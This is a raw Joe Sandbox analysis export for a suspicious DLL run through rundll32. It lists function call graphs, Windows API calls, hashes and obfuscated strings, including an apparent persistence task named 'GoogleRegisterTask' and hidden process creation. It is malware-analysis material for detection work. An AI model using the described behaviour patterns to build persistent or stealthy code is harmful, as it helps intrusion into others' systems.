17171 6f9f7a42 17170->17171 17171->17158 17172->17147 17173->17130 17179 6f9eecf6 17174->17179 17177 6f9e6868 ___vcrt_uninitialize_ptd 6 API calls 17178 6f9e4d4a 17177->17178 17178->16917 17180 6f9ef768 __DllMainCRTStartup@12 6 API calls 17179->17180 17181 6f9e5249 17180->17181 17181->17177

                Executed Functions

                Function 6F9E1B85 Relevance: 35.3, APIs: 11, Strings: 9, Instructions: 303fileCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,B5FBC098), ref: 6F9E1C0B
                • _strlen.LIBCMT ref: 6F9E1D30
                • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6F9E1D9D
                • FindNextFileW.KERNELBASE(?,?,?,?,?,B5FBC098), ref: 6F9E1FAC
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: FileFind$EnvironmentExpandFirstNextStrings_strlen
                • String ID: %s\%s$%s\%s$%s\%s$%s\*.*$-a $GoogleRegisterTask$IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7BbtB>$PT30S$s`bovb-f{f
                • API String ID: 4146766196-3364674013
                • Opcode ID: d4e5a124c581805b333b48add5c211a7b2f9aacf73cec254da13c2a77a5f89e4
                • Instruction ID: e1b6d3ef3083582703a11bd80efeb5b3cf546df129010e3ae0f48a47c7ba7a34
                • Opcode Fuzzy Hash: d4e5a124c581805b333b48add5c211a7b2f9aacf73cec254da13c2a77a5f89e4
                • Instruction Fuzzy Hash: C6C1AEB1804249ABDF21DFA4DC49FED3BB8BF16318F50842AF904DA1D2EB35D6958B50
                Function 6F9E4402 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 260sleepCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 6F9E171F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6F9E175A
                  • Part of subcall function 6F9E171F: _strlen.LIBCMT ref: 6F9E177C
                  • Part of subcall function 6F9E171F: GetProcAddress.KERNEL32(?), ref: 6F9E17E2
                  • Part of subcall function 6F9E171F: _strlen.LIBCMT ref: 6F9E180D
                • _strlen.LIBCMT ref: 6F9E4460
                • GetEnvironmentVariableW.KERNEL32(?,?,00000032), ref: 6F9E44CA
                • _strlen.LIBCMT ref: 6F9E44F0
                • _strlen.LIBCMT ref: 6F9E4571
                • _strlen.LIBCMT ref: 6F9E45E8
                  • Part of subcall function 6F9E192F: _strlen.LIBCMT ref: 6F9E19BD
                  • Part of subcall function 6F9E192F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA074C4), ref: 6F9E1A5E
                • Sleep.KERNELBASE(000005DC), ref: 6F9E4654
                • Sleep.KERNELBASE(00007530), ref: 6F9E465F
                • _strlen.LIBCMT ref: 6F9E4685
                • _strlen.LIBCMT ref: 6F9E4706
                  • Part of subcall function 6F9E1B85: FindFirstFileW.KERNELBASE(?,?,?,?,?,B5FBC098), ref: 6F9E1C0B
                Strings
                • %s%s, xrefs: 6F9E4745
                • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6F9E46E6
                • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6F9E4665
                • VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>, xrefs: 6F9E4551
                • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6F9E4440
                • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB, xrefs: 6F9E44D0
                • %s%s, xrefs: 6F9E46C4
                • %s%s, xrefs: 6F9E452F
                • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6F9E45C8
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: _strlen$Sleep$AddressCreateEnvironmentFileFindFirstHandleModuleProcProcessVariable
                • String ID: %s%s$%s%s$%s%s$VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
                • API String ID: 405535372-2132796354
                • Opcode ID: eae8d40b9bdd07769d904abfc346c06edd37a2ae3d9f13e6397d9730f34dbf7f
                • Instruction ID: 2c7680931de376de2619396eaa5f30b24a0e569f8bd1fb9356e38d6d9c49b866
                • Opcode Fuzzy Hash: eae8d40b9bdd07769d904abfc346c06edd37a2ae3d9f13e6397d9730f34dbf7f
                • Instruction Fuzzy Hash: 97A1FAB2C0024CAFDF32DBA8DC85FDD7BB8AF29209F144016E914A72C2EB3592558F55
                Function 6F9E192F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 174processCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                • _strlen.LIBCMT ref: 6F9E19BD
                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA074C4), ref: 6F9E1A5E
                • _strlen.LIBCMT ref: 6F9E1AC4
                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA074E0), ref: 6F9E1B60
                Strings
                • %s %s, xrefs: 6F9E1A24
                • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6F9E199D
                • %s %s, xrefs: 6F9E1B26
                • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6F9E1AA4
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: CreateProcess_strlen
                • String ID: %s %s$%s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
                • API String ID: 3222040079-4228346574
                • Opcode ID: 479711d39fad8989df4a24b01a2702ec981d89351e0691a40abaccb2ede4adc8
                • Instruction ID: eeba3f7f6244f04be8899fe200f099ed5ef7a916c772a5d8fc228899dd34ea34
                • Opcode Fuzzy Hash: 479711d39fad8989df4a24b01a2702ec981d89351e0691a40abaccb2ede4adc8
                • Instruction Fuzzy Hash: 57514DB1D40348ABEB31DFA4EC41FDD77A8BF19708F140029EA14AA1C2EBB5A6548B55
                Function 6F9E4CA3 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                • __RTC_Initialize.LIBCMT ref: 6F9E4CEA
                • ___scrt_uninitialize_crt.LIBCMT ref: 6F9E4D04
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: Initialize___scrt_uninitialize_crt
                • String ID:
                • API String ID: 2442719207-0
                • Opcode ID: 45cc6e3b3e78bbb5b2225db4e11605e4a27d29d19d74083c3e6b7111f2992fc5
                • Instruction ID: 37059377de260f8dd1f3dc0a93f98c3e9f8e93f29919172ca88f0f71fa4b8a1d
                • Opcode Fuzzy Hash: 45cc6e3b3e78bbb5b2225db4e11605e4a27d29d19d74083c3e6b7111f2992fc5
                • Instruction Fuzzy Hash: 0241B036D00715AFDB239F6DD800B9E76B8FF95768F01411AE814972D1D734E9828FA0
                Function 6F9E4D53 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 242 6f9e4d53-6f9e4d64 call 6f9e5570 245 6f9e4d66-6f9e4d6c 242->245 246 6f9e4d75-6f9e4d7c 242->246 245->246 247 6f9e4d6e-6f9e4d70 245->247 248 6f9e4d7e-6f9e4d81 246->248 249 6f9e4d88-6f9e4d9c dllmain_raw 246->249 250 6f9e4e4e-6f9e4e5d 247->250 248->249 251 6f9e4d83-6f9e4d86 248->251 252 6f9e4e45-6f9e4e4c 249->252 253 6f9e4da2-6f9e4db3 dllmain_crt_dispatch 249->253 254 6f9e4db9-6f9e4dbe call 6f9e1000 251->254 252->250 253->252 253->254 256 6f9e4dc3-6f9e4dcb 254->256 257 6f9e4dcd-6f9e4dcf 256->257 258 6f9e4df4-6f9e4df6 256->258 257->258 259 6f9e4dd1-6f9e4def call 6f9e1000 call 6f9e4ca3 dllmain_raw 257->259 260 6f9e4dfd-6f9e4e0e dllmain_crt_dispatch 258->260 261 6f9e4df8-6f9e4dfb 258->261 259->258 260->252 263 6f9e4e10-6f9e4e42 dllmain_raw 260->263 261->252 261->260 263->252
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: dllmain_raw$dllmain_crt_dispatch
                • String ID:
                • API String ID: 3136044242-0
                • Opcode ID: 9e088eccd0d38fd08eb9c154a935de4b8f5c823d78eca76992ee5d991dc0d9fa
                • Instruction ID: 8f10adf93c27ff6c171c97f3b492e4155e6226eb741b233104789bec73f6c139
                • Opcode Fuzzy Hash: 9e088eccd0d38fd08eb9c154a935de4b8f5c823d78eca76992ee5d991dc0d9fa
                • Instruction Fuzzy Hash: A7216075D00625AFDB234F5DCC40AAF3A69FF95A94B01411AF8285B2D0D735ED918FD0
                Function 6F9E1000 Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 268 6f9e1000-6f9e100e 269 6f9e1012-6f9e1019 call 6f9e4402 ExitProcess 268->269 270 6f9e1010-6f9e101f 268->270
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: 54fc6aacd580b97b9dcf23a0c7118d5f210e866714d3b420a18bffba4e75e17d
                • Instruction ID: 9ee46ea84656e40b968ae4b6b4acd968d6776ecdd68f5a6d189f0f0f73f1473a
                • Opcode Fuzzy Hash: 54fc6aacd580b97b9dcf23a0c7118d5f210e866714d3b420a18bffba4e75e17d
                • Instruction Fuzzy Hash: 38D01274649248EBCB059BB88905B8D77E8EF0B322F508026E514972C1D630DA44AD22

                Non-executed Functions

                Function 6F9F5C80 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
                • Instruction ID: 41f2b95840e196ad3d7dbdb32b86040b7d61d2fa60615cb2af592da44f612273
                • Opcode Fuzzy Hash: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
                • Instruction Fuzzy Hash: 93023F71E012199BDB14CFA9C98079EFBF5FF49314F24826AD915E7381D731A942CB90
                Function 6F9E53EE Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6F9E53FA
                • IsDebuggerPresent.KERNEL32 ref: 6F9E54C6
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9E54DF
                • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9E54E9
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                • String ID:
                • API String ID: 254469556-0
                • Opcode ID: 134e07f16de817758f734f24105152099ed11505c24f4926dfd762e6a870347b
                • Instruction ID: 78743b56ade3984030df1b2e3b95c62b6f536113c5d82bee217be2c7ea41bfe2
                • Opcode Fuzzy Hash: 134e07f16de817758f734f24105152099ed11505c24f4926dfd762e6a870347b
                • Instruction Fuzzy Hash: 7E31F6B5D05318EBDF21DFA4D9497CDBBB8AF08304F1041AAE50CAB290EB719A85CF45
                Function 6F9E171F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 174libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                APIs
                Strings
                • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6F9E1887
                • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6F9E17F6
                • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6F9E1765
                • kernel32.dll, xrefs: 6F9E1755
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: AddressProc_strlen$HandleModule
                • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
                • API String ID: 3538810943-2765630095
                • Opcode ID: 2a379053233ef17eba8332c404caa62232c306b5bdfab4901d23d71f89b9ffb9
                • Instruction ID: 328c724de8a8eff0298c9dd58e01739b72527d30cca24aa7d0ab3dbf1e8fcb4e
                • Opcode Fuzzy Hash: 2a379053233ef17eba8332c404caa62232c306b5bdfab4901d23d71f89b9ffb9
                • Instruction Fuzzy Hash: 1A611771C043489FDB26CFB8DC84B9CBBB9BF1A318F244129E554A7282DB359959CF00
                Function 6F9F8279 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 682 6f9f8279-6f9f82a9 call 6f9f8055 685 6f9f82ab-6f9f82b6 call 6f9f041e 682->685 686 6f9f82c4-6f9f82d0 call 6f9f513a 682->686 691 6f9f82b8-6f9f82bf call 6f9f0431 685->691 692 6f9f82e9-6f9f8332 call 6f9f7fc0 686->692 693 6f9f82d2-6f9f82e7 call 6f9f041e call 6f9f0431 686->693 700 6f9f859e-6f9f85a2 691->700 702 6f9f839f-6f9f83a8 GetFileType 692->702 703 6f9f8334-6f9f833d 692->703 693->691 704 6f9f83aa-6f9f83db GetLastError call 6f9f03d7 CloseHandle 702->704 705 6f9f83f1-6f9f83f4 702->705 707 6f9f833f-6f9f8343 703->707 708 6f9f8374-6f9f839a GetLastError call 6f9f03d7 703->708 704->691 721 6f9f83e1-6f9f83ec call 6f9f0431 704->721 712 6f9f83fd-6f9f8403 705->712 713 6f9f83f6-6f9f83fb 705->713 707->708 709 6f9f8345-6f9f8372 call 6f9f7fc0 707->709 708->691 709->702 709->708 714 6f9f8407-6f9f8455 call 6f9f5085 712->714 715 6f9f8405 712->715 713->714 724 6f9f8457-6f9f8463 call 6f9f81cf 714->724 725 6f9f8474-6f9f849c call 6f9f7d6a 714->725 715->714 721->691 724->725 731 6f9f8465 724->731 732 6f9f849e-6f9f849f 725->732 733 6f9f84a1-6f9f84e2 725->733 736 6f9f8467-6f9f846f call 6f9f2516 731->736 732->736 734 6f9f84e4-6f9f84e8 733->734 735 6f9f8503-6f9f8511 733->735 734->735 737 6f9f84ea-6f9f84fe 734->737 738 6f9f859c 735->738 739 6f9f8517-6f9f851b 735->739 736->700 737->735 738->700 739->738 741 6f9f851d-6f9f8550 CloseHandle call 6f9f7fc0 739->741 745 6f9f8584-6f9f8598 741->745 746 6f9f8552-6f9f857e GetLastError call 6f9f03d7 call 6f9f524d 741->746 745->738 746->745
                APIs
                  • Part of subcall function 6F9F7FC0: CreateFileW.KERNEL32(00000000,00000000,?,6F9F8322,?,?,00000000,?,6F9F8322,00000000,0000000C), ref: 6F9F7FDD
                • GetLastError.KERNEL32 ref: 6F9F838D
                • __dosmaperr.LIBCMT ref: 6F9F8394
                • GetFileType.KERNEL32(00000000), ref: 6F9F83A0
                • GetLastError.KERNEL32 ref: 6F9F83AA
                • __dosmaperr.LIBCMT ref: 6F9F83B3
                • CloseHandle.KERNEL32(00000000), ref: 6F9F83D3
                • CloseHandle.KERNEL32(00000000), ref: 6F9F8520
                • GetLastError.KERNEL32 ref: 6F9F8552
                • __dosmaperr.LIBCMT ref: 6F9F8559
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: 4af6af01b6e3b2ba8af986970952df45dd80cdf71fd828bcc3b3dbb060b1376c
                • Instruction ID: 3288d38ea6a097e82a780bf9916855d5d582761d7e26ab805963f75f92ec2c81
                • Opcode Fuzzy Hash: 4af6af01b6e3b2ba8af986970952df45dd80cdf71fd828bcc3b3dbb060b1376c
                • Instruction Fuzzy Hash: AAA12232A1A6149FCF199F68DC50BAE3BB5AF46328F180249E811DF2D1D775E813CB81
                Function 6F9E6ADA Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 751 6f9e6ada-6f9e6b05 call 6f9e7a50 754 6f9e6b0b-6f9e6b0e 751->754 755 6f9e6e79-6f9e6e7e call 6f9eed44 751->755 754->755 756 6f9e6b14-6f9e6b1d 754->756 758 6f9e6c1a-6f9e6c20 756->758 759 6f9e6b23-6f9e6b27 756->759 762 6f9e6c28-6f9e6c36 758->762 759->758 761 6f9e6b2d-6f9e6b34 759->761 765 6f9e6b4c-6f9e6b51 761->765 766 6f9e6b36-6f9e6b3d 761->766 763 6f9e6c3c-6f9e6c40 762->763 764 6f9e6de2-6f9e6de5 762->764 763->764 767 6f9e6c46-6f9e6c4d 763->767 769 6f9e6e08-6f9e6e11 call 6f9e6795 764->769 770 6f9e6de7-6f9e6dea 764->770 765->758 771 6f9e6b57-6f9e6b5f call 6f9e6795 765->771 766->765 768 6f9e6b3f-6f9e6b46 766->768 774 6f9e6c4f-6f9e6c56 767->774 775 6f9e6c65-6f9e6c6b 767->775 768->758 768->765 769->755 785 6f9e6e13-6f9e6e17 769->785 770->755 772 6f9e6df0-6f9e6e05 call 6f9e6e7f 770->772 784 6f9e6b65-6f9e6b7e call 6f9e6795 * 2 771->784 771->785 772->769 774->775 779 6f9e6c58-6f9e6c5f 774->779 780 6f9e6d82-6f9e6d86 775->780 781 6f9e6c71-6f9e6c98 call 6f9e57cf 775->781 779->764 779->775 787 6f9e6d88-6f9e6d91 call 6f9e62da 780->787 788 6f9e6d92-6f9e6d9e 780->788 781->780 796 6f9e6c9e-6f9e6ca1 781->796 784->755 810 6f9e6b84-6f9e6b8a 784->810 787->788 788->769 789 6f9e6da0-6f9e6daa 788->789 793 6f9e6dac-6f9e6dae 789->793 794 6f9e6db8-6f9e6dba 789->794 793->769 798 6f9e6db0-6f9e6db4 793->798 799 6f9e6dbc-6f9e6dcf call 6f9e6795 * 2 794->799 800 6f9e6dd1-6f9e6dde call 6f9e74f8 794->800 802 6f9e6ca4-6f9e6cb9 796->802 798->769 803 6f9e6db6 798->803 826 6f9e6e18 call 6f9eed08 799->826 818 6f9e6e3d-6f9e6e52 call 6f9e6795 * 2 800->818 819 6f9e6de0 800->819 806 6f9e6cbf-6f9e6cc2 802->806 807 6f9e6d63-6f9e6d76 802->807 803->799 806->807 812 6f9e6cc8-6f9e6cd0 806->812 807->802 811 6f9e6d7c-6f9e6d7f 807->811 815 6f9e6b8c-6f9e6b90 810->815 816 6f9e6bb6-6f9e6bbe call 6f9e6795 810->816 811->780 812->807 817 6f9e6cd6-6f9e6cea 812->817 815->816 822 6f9e6b92-6f9e6b99 815->822 832 6f9e6c22-6f9e6c25 816->832 833 6f9e6bc0-6f9e6be0 call 6f9e6795 * 2 call 6f9e74f8 816->833 823 6f9e6ced-6f9e6cfe 817->823 847 6f9e6e57-6f9e6e74 call 6f9e59bb call 6f9e73f8 call 6f9e75b5 call 6f9e736f 818->847 848 6f9e6e54 818->848 819->769 827 6f9e6bad-6f9e6bb0 822->827 828 6f9e6b9b-6f9e6ba2 822->828 829 6f9e6d24-6f9e6d31 823->829 830 6f9e6d00-6f9e6d11 call 6f9e6fb5 823->830 843 6f9e6e1d-6f9e6e38 call 6f9e62da call 6f9e7169 call 6f9e6486 826->843 827->755 827->816 828->827 837 6f9e6ba4-6f9e6bab 828->837 829->823 835 6f9e6d33 829->835 844 6f9e6d35-6f9e6d5d call 6f9e6a5a 830->844 845 6f9e6d13-6f9e6d1c 830->845 832->762 833->832 865 6f9e6be2-6f9e6be7 833->865 842 6f9e6d60 835->842 837->816 837->827 842->807 843->818 844->842 845->830 850 6f9e6d1e-6f9e6d21 